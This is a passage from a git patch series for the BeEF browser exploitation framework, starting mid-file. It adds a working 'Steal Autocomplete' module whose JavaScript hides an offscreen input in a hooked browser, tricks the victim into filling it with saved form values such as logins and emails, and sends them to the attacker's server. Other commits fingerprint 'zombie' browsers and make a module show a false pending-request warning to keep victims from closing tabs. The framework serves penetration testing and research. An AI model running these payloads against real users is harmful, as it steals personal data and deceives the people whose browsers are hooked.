+			
+		}
+
+		inArray = function(el, arr){
+			for (var i = 0;i < arr.length;i++)
+				if (el===arr[i])
+					return true;   
+			return false;
+		}
+
+		steal = function(n,v) {
+			var val = JSON.stringify({'input':n,'value':v});
+			if (v != "" && !inArray(val,results)){
+				results.push(val);
+				//console.log(val);
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
+			}
+		}
+
+		tt = function(ev) {
+			if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
+		}
+
+		// create hidden input element
+		input = document.createElement('input');
+		input.setAttribute("id",    "placeholder");
+		input.setAttribute("name",  "<%= @input_name %>");
+		input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
+		input.setAttribute("type",  "text");
+		input.onkeyup   = function(event) { tt(event); }
+		input.onkeydown = function(event) { tt(event); }
+		input.onblur    = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
+		document.body.appendChild(input);
+
+		// steal autocomplete
+		get_autocomplete();
+
+	}
+
+	setTimeout("steal_autocomplete();", 100);
+
+});
+
diff --git a/modules/social_engineering/autocomplete_theft/config.yaml b/modules/social_engineering/autocomplete_theft/config.yaml
new file mode 100644
index 000000000..b79eac020
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        steal_autocomplete:
+            enable: true
+            category: "Social Engineering"
+            name: "Steal Autocomplete"
+            description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.<br/>Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
+            authors: ["Stefano Di Paola", "bcoles"]
+            target:
+                working: ["FF"]
+                not_working: ["ALL"]
diff --git a/modules/social_engineering/autocomplete_theft/module.rb b/modules/social_engineering/autocomplete_theft/module.rb
new file mode 100644
index 000000000..45ab2f35d
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/module.rb
@@ -0,0 +1,49 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Stefano Di Paola
+# Ported to BeEF by bcoles
+# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
+################################################################################
+class Steal_autocomplete < BeEF::Core::Command
+
+	def self.options
+		return [
+			{	'name'         => 'input_name',
+				'type'         => 'combobox',
+				'ui_label'     => 'Input Field Name',
+				'store_type'   => 'arraystore',
+				'store_fields' => ['element_name'],
+				'store_data'   => [
+					['login'],
+					['email'],
+					['Email'],
+					['session[username_or_email]'],
+					['q'],
+					['search'],
+					['name'],
+					['company'],
+					['city'],
+					['state'],
+					['country'],
+				],
+				'emptyText'    => 'Select an input field name to steal autocomplete values',
+				'valueField'   => 'element_name',
+				'displayField' => 'element_name',
+				'mode'         => 'local',
+				'autoWidth'    => true
+			}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['results'] = @datastore['results']
+		save content
+	end
+
+end
+

From 4e7316340326ce70518441125bb8368a671f4933 Mon Sep 17 00:00:00 2001
From: radoen <scream1988@gmail.com>
Date: Sun, 3 Feb 2013 01:45:01 +0100
Subject: [PATCH 193/397] ISSUES #817

to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
---
 core/main/client/browser.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f6d1ff970..ed116c287 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1786,7 +1786,7 @@ beef.browser = {
         if (this.isIE()) this.getPluginsIE();
 
         // All other browsers that support navigator.plugins
-        else if (navigator.plugins && navigator.plugins.length > 0) {
+        else if (navigator.plugins && navigator.plugins.length > 0 && 6 == 0) {
             results = new Array();
             for (var i = 0; i < navigator.plugins.length; i++) {
 

From 4003b69646d23afa1fc4e9b5c3c1226b318b4179 Mon Sep 17 00:00:00 2001
From: radoen <scream1988@gmail.com>
Date: Sun, 3 Feb 2013 12:32:25 +0100
Subject: [PATCH 194/397] Update core/main/client/browser.js

---
 core/main/client/browser.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index ed116c287..f6d1ff970 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1786,7 +1786,7 @@ beef.browser = {
         if (this.isIE()) this.getPluginsIE();
 
         // All other browsers that support navigator.plugins
-        else if (navigator.plugins && navigator.plugins.length > 0 && 6 == 0) {
+        else if (navigator.plugins && navigator.plugins.length > 0) {
             results = new Array();
             for (var i = 0; i < navigator.plugins.length; i++) {
 

From 79e8f34b061654ca89e67477666e48877e1e9a6f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 4 Feb 2013 09:10:59 +1030
Subject: [PATCH 195/397] Add QuickTime to zombie balloon details

Add 'modules/browser/detect_quicktime'
---
 extensions/admin_ui/controllers/panel/panel.rb    |  2 ++
 .../media/javascript/ui/panel/ZombiesMgr.js       |  2 ++
 modules/browser/detect_quicktime/command.js       | 14 ++++++++++++++
 modules/browser/detect_quicktime/config.yaml      | 15 +++++++++++++++
 modules/browser/detect_quicktime/module.rb        | 14 ++++++++++++++
 5 files changed, 47 insertions(+)
 create mode 100644 modules/browser/detect_quicktime/command.js
 create mode 100644 modules/browser/detect_quicktime/config.yaml
 create mode 100644 modules/browser/detect_quicktime/module.rb

diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 65ad7a541..b853350db 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -90,6 +90,7 @@ module BeEF
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
+			has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
@@ -110,6 +111,7 @@ module BeEF
                 'has_java'        => has_java,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
+				'has_quicktime'   => has_quicktime,
                 'date_stamp'      => date_stamp
             }
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index a30f9cc4c..0dad2631e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -29,6 +29,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
         var has_java           = zombie_array[index]["has_java"];
 		var has_activex        = zombie_array[index]["has_activex"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
+		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
 		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -46,6 +47,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
         balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
+		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
 		
diff --git a/modules/browser/detect_quicktime/command.js b/modules/browser/detect_quicktime/command.js
new file mode 100644
index 000000000..a0ff8f388
--- /dev/null
+++ b/modules/browser/detect_quicktime/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasQuickTime())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
+
+});
+
diff --git a/modules/browser/detect_quicktime/config.yaml b/modules/browser/detect_quicktime/config.yaml
new file mode 100644
index 000000000..5978a8bfe
--- /dev/null
+++ b/modules/browser/detect_quicktime/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_quicktime:
+            enable: true
+            category: "Browser"
+            name: "Detect QuickTime"
+            description: "This module will check if the browser has Quicktime support."
+            authors: ["bcoles"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_quicktime/module.rb b/modules/browser/detect_quicktime/module.rb
new file mode 100644
index 000000000..b58d7066e
--- /dev/null
+++ b/modules/browser/detect_quicktime/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_quicktime < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['quicktime'] = @datastore['quicktime']
+		save content
+	end
+
+end

From 4852cab66d42101b4597bdf623718c9d71746bdb Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 4 Feb 2013 12:09:46 +0000
Subject: [PATCH 196/397] Properly adjusted onClose command module to annoy the
 user also in latest Firefox.

---
 modules/persistence/confirm_close_tab/command.js  | 1 +
 modules/persistence/confirm_close_tab/config.yaml | 2 +-
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
index 61c12ae79..093149ab4 100644
--- a/modules/persistence/confirm_close_tab/command.js
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -22,6 +22,7 @@ beef.execute(function() {
             if (e.stopPropagation) {
                 e.stopPropagation();
                 e.preventDefault();
+                e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
             }
         }
 
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
index 8ebef1f15..154bcfb64 100644
--- a/modules/persistence/confirm_close_tab/config.yaml
+++ b/modules/persistence/confirm_close_tab/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Persistence"
             name: "Confirm Close Tab"
-            description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
+            description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12. In Chrome you can't keep opening confirm dialogs."
             authors: ["antisnatchor"]
             target:
                 user_notify: ["ALL"]

From 11a56c5ce961700ba53c1bd55df50c1ad6ba7ee3 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 5 Feb 2013 01:41:21 +1030
Subject: [PATCH 197/397] Add hasQuickTime to browser object

---
 core/main/client/browser.js | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f6d1ff970..9d3cc9beb 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -2075,6 +2075,7 @@ beef.browser = {
         var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
         var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
         var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
+		var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
         var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
         var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
 
@@ -2104,6 +2105,7 @@ beef.browser = {
         if (has_googlegears) details['HasGoogleGears'] = has_googlegears
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
+		if (has_quicktime) details['HasQuickTime'] = has_quicktime;
         if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
         if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
 

From bf19223a0156e1e13552e3ae3ef9b2595c6d57fa Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 7 Feb 2013 02:43:58 +1030
Subject: [PATCH 198/397] Add 'HasQuickTime' to
 core/main/handlers/browserdetails.rb

---
 core/main/handlers/browserdetails.rb | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index dbce1ad87..97761aa5d 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -260,7 +260,15 @@ module BeEF
           if BeEF::Filters.is_valid_yes_no?(has_silverlight)
             BD.set(session_id, 'HasSilverlight', has_silverlight)
           else
-            self.err_msg "Invalid value for Silverlight returned from the hook browser's initial connection."
+            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasQuickTime
+          has_quicktime = get_param(@data['results'], 'HasQuickTime')
+          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
+            BD.set(session_id, 'HasQuickTime', has_quicktime)
+          else
+            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
           end
 
           # get and store the value for CPU

From 2d08183eef8f468680b81c1e1b319b47c0f51c55 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 7 Feb 2013 02:44:40 +1030
Subject: [PATCH 199/397] Refactor 'select_zombie_summary'

    extensions/admin_ui/controllers/modules/modules.rb
    extensions/console/lib/shellinterface.rb

Fix issue #837
---
 .../admin_ui/controllers/modules/modules.rb   | 480 +++--------------
 extensions/console/lib/shellinterface.rb      | 481 +++---------------
 2 files changed, 152 insertions(+), 809 deletions(-)

diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 86669173e..79ed04767 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -61,416 +61,84 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       'results' => []
     }
 
-    # set and add the return values for the page title
-    page_title = BD.get(zombie_session, 'PageTitle') 
-    if not page_title.nil?
-      encoded_page_title = CGI.escapeHTML(page_title)
-      encoded_page_title_hash = { 'Page Title' => encoded_page_title }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_title_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
+    # zombie properties
+    # in the form of: category, UI label, value
+    zombie_properties = [
+
+        # Browser
+        ['Browser', 'Browser Name',       'BrowserName'],
+        ['Browser', 'Browser Version',    'BrowserVersion'],
+        ['Browser', 'Browser UA String',  'BrowserReportedName'],
+        ['Browser', 'Browser Platform',   'BrowserPlatform'],
+        ['Browser', 'Browser Plugins',    'BrowserPlugins'],
+        ['Browser', 'Window Size',        'WindowSize'],
+
+        # Browser Components
+        ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Java',               'JavaEnabled'],
+        ['Browser Components', 'VBScript',           'VBScriptEnabled'],
+        ['Browser Components', 'PhoneGap',           'HasPhonegap'],
+        ['Browser Components', 'Google Gears',       'HasGoogleGears'],
+        ['Browser Components', 'Silverlight',        'HasSilverlight'],
+        ['Browser Components', 'Web Sockets',        'HasWebSocket'],
+        ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'ActiveX',            'HasActiveX'],
+        ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
+        ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
+
+        # Hooked Page
+        ['Hooked Page', 'Page Title',    'PageTitle'],
+        ['Hooked Page', 'Page URI',      'PageURI'],
+        ['Hooked Page', 'Page Referrer', 'PageReferrer'],
+        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Cookies',       'Cookies'],
+
+        # Host
+        ['Host', 'Date',             'DateStamp'],
+        ['Host', 'Operating System', 'OsName'],
+        ['Host', 'Hardware',         'Hardware'],
+        ['Host', 'CPU',              'CPU'],
+        ['Host', 'Screen Size',      'ScreenSize']
+    ]
+
+    # set and add the return values for each browser property
+    # in the form of: category, UI label, value
+    zombie_properties.each do |p|
+
+      case p[2]
+        when "BrowserName"
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+
+        when "ScreenSize"
+          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = screen_size_hash['width']
+          height = screen_size_hash['height']
+          cdepth = screen_size_hash['colordepth']
+          data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
+
+        when "WindowSize"
+          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = window_size_hash['width']
+          height = window_size_hash['height']
+          data   = "Width: #{width}, Height: #{height}"
+        else
+          data   = BD.get(zombie_session, p[2]) 
+      end
+
+      # add property to summary hash
+      if not data.nil?
+        summary_grid_hash['results'].push({
+          'category' => p[0],
+          'data'     => { p[1] => CGI.escapeHTML("#{data}") },
+          'from'     => 'Initialization'
+        })
+      end
+
     end
 
-    # set and add the return values for the page uri
-    page_uri = BD.get(zombie_session, 'PageURI')
-    if not page_uri.nil?
-      encoded_page_uri = CGI.escapeHTML(page_uri)
-      encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_uri_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the page referrer
-    page_referrer = BD.get(zombie_session, 'PageReferrer')
-    if not page_referrer.nil?
-      encoded_page_referrer = CGI.escapeHTML(page_referrer)
-      encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_referrer_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the host name
-    host_name = BD.get(zombie_session, 'HostName') 
-    if not host_name.nil?
-      encoded_host_name = CGI.escapeHTML(host_name)
-      encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
-    
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_host_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the return values for the date stamp
-    date_stamp = BD.get(zombie_session, 'DateStamp')
-    if not date_stamp.nil?
-      encoded_date_stamp = CGI.escapeHTML(date_stamp)
-      encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_date_stamp_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    os_name = BD.get(zombie_session, 'OsName')
-    if not os_name.nil?
-      encoded_os_name = CGI.escapeHTML(os_name)
-      encoded_os_name_hash = { 'OS Name' => encoded_os_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_os_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the hardware name
-    hw_name = BD.get(zombie_session, 'Hardware')
-    if not hw_name.nil?
-      encoded_hw_name = CGI.escapeHTML(hw_name)
-      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_hw_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
-    # set and add the return values for the browser name
-    browser_name = BD.get(zombie_session, 'BrowserName') 
-    if not browser_name.nil?
-      friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
-      browser_name_hash = { 'Browser Name' => friendly_browser_name }
-
-      browser_name_row = {
-        'category' => 'Browser',
-        'data' => browser_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_name_row) # add the row
-    end
-    
-    # set and add the return values for the browser version
-    browser_version = BD.get(zombie_session, 'BrowserVersion') 
-    if not browser_version.nil?
-      encoded_browser_version = CGI.escapeHTML(browser_version)
-      browser_version_hash = { 'Browser Version' => encoded_browser_version }
-
-      browser_version_row = {
-        'category' => 'Browser',
-         'data' => browser_version_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_version_row) # add the row
-    end
-    
-    # set and add the return values for the browser ua string
-    browser_uastring = BD.get(zombie_session, 'BrowserReportedName')
-    if not browser_uastring.nil?
-      browser_uastring_hash = { 'Browser UA String' => browser_uastring }
-
-      browser_uastring_row = {
-        'category' => 'Browser',
-         'data' => browser_uastring_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_uastring_row) # add the row
-    end
-    
-    # set and add the list of cookies
-    cookies = BD.get(zombie_session, 'Cookies')
-    if not cookies.nil? and not cookies.empty?
-      encoded_cookies = CGI.escapeHTML(cookies)
-      encoded_cookies_hash = { 'Cookies' => encoded_cookies }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_cookies_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the list of plugins installed in the browser
-    browser_plugins = BD.get(zombie_session, 'BrowserPlugins')
-    if not browser_plugins.nil? and not browser_plugins.empty?
-      encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
-      encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
-      
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_browser_plugins_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the Browser Platform
-    system_platform = BD.get(zombie_session, 'BrowserPlatform')
-    if not system_platform.nil?
-      encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'Browser Platform' => encoded_system_platform }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_system_platform_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie screen size and color depth
-    screen_size = BD.get(zombie_session, 'ScreenSize')
-    if not screen_size.nil?
-      
-      screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = screen_size_hash['width']
-      (print_error "width is wrong type";return) if not width.is_a?(Fixnum)
-      height = screen_size_hash['height']
-      (print_error "height is wrong type";return) if not height.is_a?(Fixnum)
-      colordepth = screen_size_hash['colordepth']
-      (print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
-      
-      # construct the string to be displayed in the details tab
-      encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
-      encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_screen_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie browser window size
-    window_size = BD.get(zombie_session, 'WindowSize')
-    if not window_size.nil?
-
-      window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = window_size_hash['width']
-      (print_error "width is wrong type";return) if not width.is_a?(Fixnum)
-      height = window_size_hash['height']
-      (print_error "height is wrong type";return) if not height.is_a?(Fixnum)
-
-      # construct the string to be displayed in the details tab
-      encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
-      encoded_window_size_hash = { 'Window Size' => encoded_window_size }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_window_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for JavaEnabled
-    java_enabled = BD.get(zombie_session, 'JavaEnabled')
-    if not java_enabled.nil?
-      encoded_java_enabled = CGI.escapeHTML(java_enabled)
-      encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_java_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for VBScriptEnabled
-    vbscript_enabled = BD.get(zombie_session, 'VBScriptEnabled')
-    if not vbscript_enabled.nil?
-      encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
-      encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_vbscript_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasFlash
-    has_flash = BD.get(zombie_session, 'HasFlash')
-    if not has_flash.nil?
-      encoded_has_flash = CGI.escapeHTML(has_flash)
-      encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_flash_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for hasPhonegap
-    has_phonegap = BD.get(zombie_session, 'hasPhonegap')
-    if not has_phonegap.nil?
-      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
-      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_phonegap_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasGoogleGears
-    has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
-    if not has_googlegears.nil?
-      encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
-      encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_googlegears_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasWebSocket
-    has_web_socket = BD.get(zombie_session, 'HasWebSocket')
-    if not has_web_socket.nil?
-      encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
-      encoded_has_web_socket_hash = { 'Has WebSockets' => encoded_has_web_socket }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_web_socket_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasActiveX
-    has_activex = BD.get(zombie_session, 'HasActiveX')
-    if not has_activex.nil?
-      encoded_has_activex = CGI.escapeHTML(has_activex)
-      encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_activex_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasSilverlight
-    has_silverlight = BD.get(zombie_session, 'HasSilverlight')
-    if not has_silverlight.nil?
-      encoded_has_silverlight = CGI.escapeHTML(has_silverlight)
-      encoded_has_silverlight_hash = { 'Has Silverlight' => encoded_has_silverlight }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_silverlight_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-	# set and add the value for CPU
-	cpu_type = BD.get(zombie_session, 'CPU')
-	if not cpu_type.nil?
-	  encoded_cpu_type = CGI.escapeHTML(cpu_type)
-	  encoded_cpu_type_hash = { 'CPU' => encoded_cpu_type }
-
-	  page_name_row = {
-	    'category' => 'Host',
-	    'data' => encoded_cpu_type_hash,
-	    'from' => 'Initialization'
-	  }
-
-	  summary_grid_hash['results'].push(page_name_row) # add the row
-	end
-
-    # set and add the return values for hasSessionCookies
-    has_session_cookies = BD.get(zombie_session, 'hasSessionCookies')
-    if not has_session_cookies.nil?
-      encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
-      encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_session_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
